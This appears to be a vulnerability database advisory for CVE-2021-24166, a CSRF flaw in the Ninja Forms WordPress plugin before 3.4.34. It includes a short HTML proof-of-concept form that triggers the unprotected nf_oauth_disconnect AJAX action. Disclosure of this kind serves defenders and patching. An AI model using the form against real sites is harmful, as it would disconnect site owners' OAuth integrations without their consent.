WordPress Plugin Vulnerabilities

Ninja Forms < 3.4.34 - CSRF to OAuth Service Disconnection

Description

The wp_ajax_nf_oauth_disconnect from the plugin had no nonce protection making it possible for attackers to craft a request to disconnect a site's OAuth connection.

Proof of Concept

<html>
  <body>
    <form action="https://[URL_HERE]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="nf_oauth_disconnect" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
ninja-forms
Fixed in 3.4.34

References

CVE
CVE-2021-24166
URL
https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified
Yes
WPVDB ID
b531fb65-a8ff-4150-a9a1-2a62a3c00bd6

Timeline

Publicly Published
2021-02-16 (about 3 years ago)
Added
2021-02-17 (about 3 years ago)
Last Updated
2021-03-19 (about 3 years ago)

Other

Published
Title
Published
2023-08-11
Title
WooCommerce PDF Invoice Builder < 1.2.91 - Invoice Update via CSRF
Published
2023-02-06
Title
0mk Shortener <= 0.2 - Stored XSS via CSRF
Published
2023-05-25
Title
Product Gallery Slider for WooCommerce < 2.2.9 - Cross-Site Request Forgery (CSRF)
Published
2021-07-19
Title
RestroPress < 2.8.3 - Cart Manipulation via CSRF
Published
2023-01-19
Title
Nice PayPal Button Lite <= 1.3.5 - CSRF